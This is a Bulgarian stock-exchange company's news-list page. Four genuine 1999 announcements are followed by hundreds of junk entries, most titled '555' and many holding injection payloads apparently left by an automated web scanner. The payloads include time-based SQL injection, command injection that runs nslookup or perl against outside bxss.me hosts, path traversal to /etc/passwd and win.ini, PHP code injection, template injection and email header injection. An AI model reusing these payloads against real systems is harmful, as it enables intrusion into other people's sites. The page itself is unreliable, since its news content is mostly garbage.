Новини за СФБ Капиталов пазар АД

Българският капиталов пазар отбелязва седем години от своето създаване.
Българският капиталов пазар отбелязва седем години от своето създаване. На 8 април 1992 г. Софийска фондова борса (сега СФБ "Капиталов пазар" АД) организира провеждането на първата публична борсова сесия в новата икономическа история на България. (08.04.1999)

14.05.1999  Годишно общо събрание на акционерите на СФБ Капиталов пазар АД на 15.06.1999 г.

16.06.1999  Общото събрание на акционерите на СФБ Капиталов пазар АД гласува промени в управлението на дружеството

14.09.1999  Вписани са промени в управлението на СФБ Капиталов пазар АД

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

29.11.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  bxss.me/t/xss.html?%00

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  newslist.php

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  response.write(9659517*9578599)

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  UYeO7tj2

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  )

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  ../../../../../../../../../../../../../../windows/win.ini

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  ../555

01.12.1999  555

01.12.1999  ./555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  

01.12.1999  555

01.12.1999  555

01.12.1999  '"()

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  /xfs.bxss.me

01.12.1999  555

01.12.1999  555

01.12.1999  988135

01.12.1999  555

01.12.1999  555

01.12.1999  http://xfs.bxss.me

01.12.1999  555

01.12.1999  555

01.12.1999  //xfs.bxss.me

01.12.1999  555

01.12.1999  /\xfs.bxss.me

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  '"

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  ';print(md5(31337));$a='

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  ";print(md5(31337));$a="

01.12.1999  555

01.12.1999  555

01.12.1999  ${@print(md5(31337))}

01.12.1999  555

01.12.1999  555

01.12.1999  ${@print(md5(31337))}\

01.12.1999  555

01.12.1999  555

01.12.1999  '.print(md5(31337)).'

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  ${10000493+9999954}

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555'"()&%

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  '"()&%

01.12.1999  555

01.12.1999  555

01.12.1999  5559306670

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  12345'"\'\");|]*{ <>

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

01.12.1999  1some_inexistent_file_with_long_name.jpg

01.12.1999  Http://bxss.me/t/fit.txt

01.12.1999  http://bxss.me/t/fit.txt?.jpg

01.12.1999  bxss.me

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  0oZ30t1C

01.12.1999  -1 OR 2+275-275-1=0+0+0+1 --

01.12.1999  -1 OR 3+275-275-1=0+0+0+1 --

01.12.1999  -1 OR 3*2<(0+5+275-275) --

01.12.1999  -1 OR 3*2>(0+5+275-275) --

01.12.1999  -1 OR 2+662-662-1=0+0+0+1

01.12.1999  -1 OR 3+662-662-1=0+0+0+1

01.12.1999  -1 OR 3*2<(0+5+662-662)

01.12.1999  -1 OR 3*2>(0+5+662-662)

01.12.1999  -1' OR 2+444-444-1=0+0+0+1 --

01.12.1999  -1' OR 3+444-444-1=0+0+0+1 --

01.12.1999  -1' OR 3*2<(0+5+444-444) --

01.12.1999  -1' OR 3*2>(0+5+444-444) --

01.12.1999  -1' OR 2+266-266-1=0+0+0+1 or 'FCPvTzQE'='

01.12.1999  -1' OR 3+266-266-1=0+0+0+1 or 'FCPvTzQE'='

01.12.1999  -1' OR 3*2<(0+5+266-266) or 'FCPvTzQE'='

01.12.1999  -1' OR 3*2>(0+5+266-266) or 'FCPvTzQE'='

01.12.1999  -1" OR 2+195-195-1=0+0+0+1 --

01.12.1999  -1" OR 3+195-195-1=0+0+0+1 --

01.12.1999  -1" OR 3*2<(0+5+195-195) --

01.12.1999  -1" OR 3*2>(0+5+195-195) --

01.12.1999  if(now()=sysdate(),sleep(15),0)

01.12.1999  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

01.12.1999  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

01.12.1999  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

01.12.1999  -1; waitfor delay '0:0:15' --

01.12.1999  -1); waitfor delay '0:0:15' --

01.12.1999  1 waitfor delay '0:0:15' --

01.12.1999  N13UHGD7'; waitfor delay '0:0:15' --

01.12.1999  -5 OR 125=(SELECT 125 FROM PG_SLEEP(15))--

01.12.1999  -5) OR 148=(SELECT 148 FROM PG_SLEEP(15))--

01.12.1999  -1)) OR 619=(SELECT 619 FROM PG_SLEEP(15))--

01.12.1999  GWo8MoIy' OR 437=(SELECT 437 FROM PG_SLEEP(15))--

01.12.1999  vdpUZxcc') OR 246=(SELECT 246 FROM PG_SLEEP(15))--

01.12.1999  Q7CBKW0t')) OR 491=(SELECT 491 FROM PG_SLEEP(15))--

01.12.1999  555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

01.12.1999  555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

01.12.1999  1'"

01.12.1999  1

01.12.1999  @@KdFpL

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  h118YF2V

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  newslist.php

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  newslist.php

01.12.1999  response.write(9515537*9306589)

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  newslist.php/.

01.12.1999  555

01.12.1999  555

01.12.1999  xfs.bxss.me

01.12.1999  '+response.write(9515537*9306589)+'

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  927665

01.12.1999  "+response.write(9515537*9306589)+"

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  ${10000141+10000336}

01.12.1999  http://xfs.bxss.me?bia-bg.com

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555 bcc:009247.1749-1967.1749.041c9.19396.2@bxss.me

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  to@example.com> bcc:009247.1749-1968.1749.041c9.19396.2@bxss.me

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  xfs.bxss.me?bia-bg.com

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  //xfs.bxss.me?bia-bg.com

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  /\xfs.bxss.me?bia-bg.com

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  '.gethostbyname(lc('hitfm'.'snyakzpg08342.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(71).chr(110).chr(88).'

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  HttP://bxss.me/t/xss.html?%00

01.12.1999  ".gethostbyname(lc("hitib"."rodsadfp6656a.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(85).chr(103).chr(87)."

01.12.1999  555

01.12.1999  555

01.12.1999  echo fqknih$()\ llftgx\nz^xyu||a #' &echo fqknih$()\ llftgx\nz^xyu||a #|" &echo fqknih$()\ llftgx\nz^xyu||a #

01.12.1999  bxss.me/t/xss.html?%00

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  ../../../../../../../../../../../../../../etc/passwd

01.12.1999  555

01.12.1999  555

01.12.1999  &echo yfkijv$()\ caqdyw\nz^xyu||a #' &echo yfkijv$()\ caqdyw\nz^xyu||a #|" &echo yfkijv$()\ caqdyw\nz^xyu||a #

01.12.1999  555

01.12.1999  555

01.12.1999  ../../../../../../../../../../../../../../windows/win.ini

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  |echo hwambh$()\ ofvgpu\nz^xyu||a #' |echo hwambh$()\ ofvgpu\nz^xyu||a #|" |echo hwambh$()\ ofvgpu\nz^xyu||a #

01.12.1999  file:///etc/passwd

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  (nslookup hitidcygwaiwq87901.bxss.me||perl -e "gethostbyname('hitidcygwaiwq87901.bxss.me')")

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  $(nslookup hitlkinnnxcmc79bbe.bxss.me||perl -e "gethostbyname('hitlkinnnxcmc79bbe.bxss.me')")

01.12.1999  ../555

01.12.1999  555

01.12.1999  &nslookup hitzuxcudossl63ee0.bxss.me&'\"`0&nslookup hitzuxcudossl63ee0.bxss.me&`'

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  &(nslookup hitkbndjyiujgd0287.bxss.me||perl -e "gethostbyname('hitkbndjyiujgd0287.bxss.me')")&'\"`0&(nslookup hitkbndjyiujgd0287.bxss.me||perl -e "gethostbyname('hitkbndjyiujgd0287.bxss.me')")&`'

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  ./555

01.12.1999  |(nslookup hitmqsfmfvfti31dc8.bxss.me||perl -e "gethostbyname('hitmqsfmfvfti31dc8.bxss.me')")

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  `(nslookup hitmhxtlnapct03f81.bxss.me||perl -e "gethostbyname('hitmhxtlnapct03f81.bxss.me')")`

01.12.1999  555

01.12.1999  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  ;(nslookup hittiosyftzwp7de8a.bxss.me||perl -e "gethostbyname('hittiosyftzwp7de8a.bxss.me')")|(nslookup hittiosyftzwp7de8a.bxss.me||perl -e "gethostbyname('hittiosyftzwp7de8a.bxss.me')")&(nslookup hittiosyftzwp7de8a.bxss.me||perl -e "gethostbyname('hittio

01.12.1999  "+"A".concat(70-3).concat(22*4).concat(119).concat(75).concat(116).concat(84)+(require"socket" Socket.gethostbyname("hitrd"+"jvohwlwg8509e.bxss.me.")[3].to_s)+"

01.12.1999  555

01.12.1999  ';print(md5(31337));$a='

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  '+'A'.concat(70-3).concat(22*4).concat(105).concat(66).concat(104).concat(90)+(require'socket' Socket.gethostbyname('hityp'+'hqwwuqoz88dde.bxss.me.')[3].to_s)+'

01.12.1999  555

01.12.1999  ";print(md5(31337));$a="

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  ${@print(md5(31337))}

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  ${@print(md5(31337))}\

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  555

01.12.1999  '"

01.12.1999  '.print(md5(31337)).'

01.12.1999  555

01.12.1999